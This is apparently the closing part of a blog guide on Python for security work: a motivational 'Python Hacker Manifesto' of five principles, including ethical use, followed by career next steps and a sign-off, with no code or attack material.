  • Asynchronous programming
  • Metaclasses
  • Memory optimization
  • Performance profiling
  • Testing and debugging
  • Documentation
  • Packaging and distribution

Your Python Hacker Manifesto

"Code is not just instructions for computers it's a way of thinking about problems. Master Python, and you master the art of systematic problem-solving."

The Five Principles

  1. Automate Everything

    • If you do it twice, script it
    • If you script it, optimize it
    • If you optimize it, share it
  2. Security First

    • Validate all inputs
    • Handle errors gracefully
    • Log everything
    • Trust nothing
  3. Continuous Learning

    • Read code daily
    • Build something new weekly
    • Contribute monthly
    • Teach others
  4. Elegant Solutions

    • Simple is better than complex
    • Readable code is maintainable code
    • Performance matters, but correctness comes first
  5. Ethical Use

    • Use your skills responsibly
    • Protect the innocent
    • Share knowledge
    • Build a better, more secure world

Beyond This Guide

Next Steps in Your Journey

  1. Contribute to Open Source

    • Fix bugs in existing tools
    • Add features to security frameworks
    • Create new innovative solutions
  2. Build Your Portfolio

    • GitHub with quality projects
    • Blog about your discoveries
    • Speak at conferences
    • Mentor newcomers
  3. Stay Current

    • Follow security research
    • Learn new Python features
    • Adapt to emerging threats
    • Network with professionals

Remember

Python is not just a programming language — it’s your gateway to understanding systems, networks, and security at a fundamental level. Every line of code you write makes you a better hacker, a better problem solver, and a better professional.

"The best hackers don't just use tools — they build them. And the best tools are built with Python."

Start coding. Start thinking. Start hacking.


Happy Hacking! 🐍🔐

This post is licensed under CC BY 4.0 by the author.